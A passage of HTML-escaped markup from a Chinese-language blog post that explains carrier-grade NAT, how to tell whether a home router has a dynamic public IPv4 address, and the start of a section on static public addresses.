src=&quot;https://www.qxhut.cn/zb_users/upload/2025/04/202504081744078333669868.png&quot; alt=&quot;1744078329961.png&quot;/&gt;&lt;img data-width=&quot;610&quot; data-height=&quot;354&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/04/202504081744078374890080.png&quot; alt=&quot;1744078371080.png&quot;/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; text-indent: 2em; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px; visibility: visible;&quot;&gt;&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;section nodeleaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; text-align: center; line-height: 2em;&quot;&gt;&lt;/section&gt;&lt;section style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; text-indent: 2em; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;当我们看到，我们家里路由器使用PPPOE拨号，获取的是100/10开头的IP地址时，这就是路由器没有获取到公网IP地址，而获取到了一个大内网地址。&lt;/span&gt;&lt;/span&gt;&lt;/section&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; text-indent: 2em; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;在早些年，我们家里的路由器上网时，都是通过私有IP地址192.168.x.x通过NAT转换为运营商分配的一个公网IP地址，如221.18.x.x。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; letter-spacing: 0.544px; text-indent: 2em; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;但是随着公网IP地址耗尽，运营商&lt;/span&gt;&lt;/span&gt;&lt;span leaf=&quot;&quot; data-pm-slice=&quot;1 1 [&amp;quot;para&amp;quot;,{&amp;quot;tagName&amp;quot;:&amp;quot;p&amp;quot;,&amp;quot;attributes&amp;quot;:{},&amp;quot;namespaceURI&amp;quot;:&amp;quot;http://www.w3.org/1999/xhtml&amp;quot;}]&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;在骨干网中部署NAT设备，将成千上万用户的公网IP进一步转换为更少的公网IP，&lt;/span&gt;&lt;/span&gt;&lt;span leaf=&quot;&quot; data-pm-slice=&quot;1 1 [&amp;quot;para&amp;quot;,{&amp;quot;tagName&amp;quot;:&amp;quot;p&amp;quot;,&amp;quot;attributes&amp;quot;:{},&amp;quot;namespaceURI&amp;quot;:&amp;quot;http://www.w3.org/1999/xhtml&amp;quot;}]&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; text-indent: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;让&lt;/span&gt;&lt;/span&gt;&lt;span leaf=&quot;&quot; data-pm-slice=&quot;1 1 [&amp;quot;para&amp;quot;,{&amp;quot;tagName&amp;quot;:&amp;quot;p&amp;quot;,&amp;quot;attributes&amp;quot;:{},&amp;quot;namespaceURI&amp;quot;:&amp;quot;http://www.w3.org/1999/xhtml&amp;quot;}]&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; text-indent: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;你家的路由器实际获取的是运营商内网IP（如 100.64.1.100，属于运营商保留的私有IP段）俗称：CGNAT。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; letter-spacing: 0.544px; text-indent: 2em; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;获取到大内网的IP地址，使用大内网IP地址，有以下几个特点：&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol class=&quot; list-paddingleft-2&quot; style=&quot;-webkit-tap-highlight-color: transparent; padding: 0px 0px 0px 1.2em; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;li&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; font-size: 17px; letter-spacing: 0.544px; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;wan口PPPOE拨号获取IP地址是，100开头的或者10开头的内网地址。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;section style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; font-size: 17px; letter-spacing: 0.544px; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;需要双重NAT，&lt;/span&gt;&lt;/span&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;数据包经过两次地址转换：家庭路由器NAT → 运营商CGNAT → 公网&lt;/span&gt;&lt;/span&gt;&lt;/section&gt;&lt;/li&gt;&lt;li&gt;&lt;section style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; font-size: 17px; letter-spacing: 0.544px; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;我们判断你的网络是否是大内网，最直观的判断，就是看WAN通过PPPOE拨号，获取的是否是100/10开头的内网地址，而非公网IP地址。&lt;/span&gt;&lt;/span&gt;&lt;/section&gt;&lt;/li&gt;&lt;li&gt;&lt;section style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; font-size: 17px; letter-spacing: 0.544px; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;虽然你的路由器获取的是大内网IP地址，但是你的所有设备在内网中，通过多层地址NAT转换，依然能和外界通信。就是要经过多次的NAT转发。数据包要多跑一段。&lt;/span&gt;&lt;/span&gt;&lt;/section&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; data-pm-slice=&quot;1 1 [&amp;quot;para&amp;quot;,{&amp;quot;tagName&amp;quot;:&amp;quot;section&amp;quot;,&amp;quot;attributes&amp;quot;:{&amp;quot;style&amp;quot;:&amp;quot;text-indent: 2em;&amp;quot;},&amp;quot;namespaceURI&amp;quot;:&amp;quot;&amp;quot;}]&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px; color: #007AAA; font-weight: bold;&quot;&gt;二、我们再来看一下，什么叫获取动态公网IP地址？&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; letter-spacing: 0.544px; text-indent: 2em; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;我们直接可以看到，当我们路由器的wan口，使用pppoe拨号的时候，获取的IP地址不是100或10开头的IP地址，而是112.193.x.x开头的，那基本上你路由器获取的就是公网Ip地址了。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;img data-width=&quot;727&quot; data-height=&quot;522&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/04/202504081744078492555815.png&quot; alt=&quot;1744078468513.png&quot;/&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; letter-spacing: 0.544px; text-indent: 2em; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;那如何确定自己是否获取的是公网Ip地址呢？&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; letter-spacing: 0.544px; text-indent: 2em; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;我们可以直接在百度中搜索：ip，可以看到，当搜索出来的ip地址和你路由器wan口获取的公网Ip地址一样时，那就说明，你路由器获取的ip地址，的确是公网IP地址。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; letter-spacing: 0.544px; text-indent: 2em; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;&lt;img data-width=&quot;632&quot; data-height=&quot;258&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/04/202504081744078573310165.png&quot; alt=&quot;1744078570756.png&quot;/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;section nodeleaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; text-align: center; line-height: 2em;&quot;&gt;&lt;/section&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;这时我们就获取的是动态公网Ip地址，那为什么叫动态公网Ip地址呢？&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;当我们获取的不是100或者10开头的大内网地址，我们在PPPOE拨号的时候，基本上就是可以从运营商那里分配到真实的公网Ipv4地址了。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;当然了，我们也可以看一下，私网的Ip地址范围：&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;&lt;img data-width=&quot;762&quot; data-height=&quot;444&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/04/202504081744078592702106.jpg&quot; alt=&quot;1744078587094.jpg&quot;/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;section nodeleaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; text-align: center; line-height: 2em;&quot;&gt;&lt;/section&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;当我们获取到动态公网IP地址时，我们可以直接从外网访问你的设备，当然了，这需要我们配合端口映射才能实现。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;动态公网IP地址，有个缺点，就是IP地址会定期变化，重启光猫/48小时强制重拨，需要绑定动态域名。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;对于动态公网IP地址获取，在之前有些地区，如果获取的是大内网Ip地址，还是可以通过致电客服来申请成动态公网IP地址的，但是现在很多地方都已经无法申请到动态公网Ip地址，假如，我们有动态公网Ip地址，对于自己搭建的NAS、个人服务器都很好的在外网测试。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;而且如果路由器拿到的是公网IP地址，就少了一层NAT转换，数据转发速度更快了，性能更高了。最主要的，可玩性高。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;还有一点，虽说获取的是公网IP地址，但是使用的PPPOE拨号，带宽的上下行是不对等的。还是属于是&lt;/span&gt;&lt;/span&gt;&lt;span leaf=&quot;&quot; data-pm-slice=&quot;1 1 [&amp;quot;para&amp;quot;,{&amp;quot;tagName&amp;quot;:&amp;quot;section&amp;quot;,&amp;quot;attributes&amp;quot;:{},&amp;quot;namespaceURI&amp;quot;:&amp;quot;http://www.w3.org/1999/xhtml&amp;quot;}]&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;共享带宽，同一区域内的多个用户共用一条网络线路，人使用多的时候，还可能网速会慢的。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px; color: #AB1942; font-weight: bold;&quot;&gt;三、什么是静态公网地址？&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;我们看一下，下面的路由器配置，可以看到联网方式，选择的是静态IP，而且ip地址都是自己手动配置上去的，那这种方式，就是静态公网地址。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;img data-width=&quot;927&quot; data-height=&quot;469&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/04/202504081744078639674034.png&quot; alt=&quot;1744078633055.png&quot;/&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span 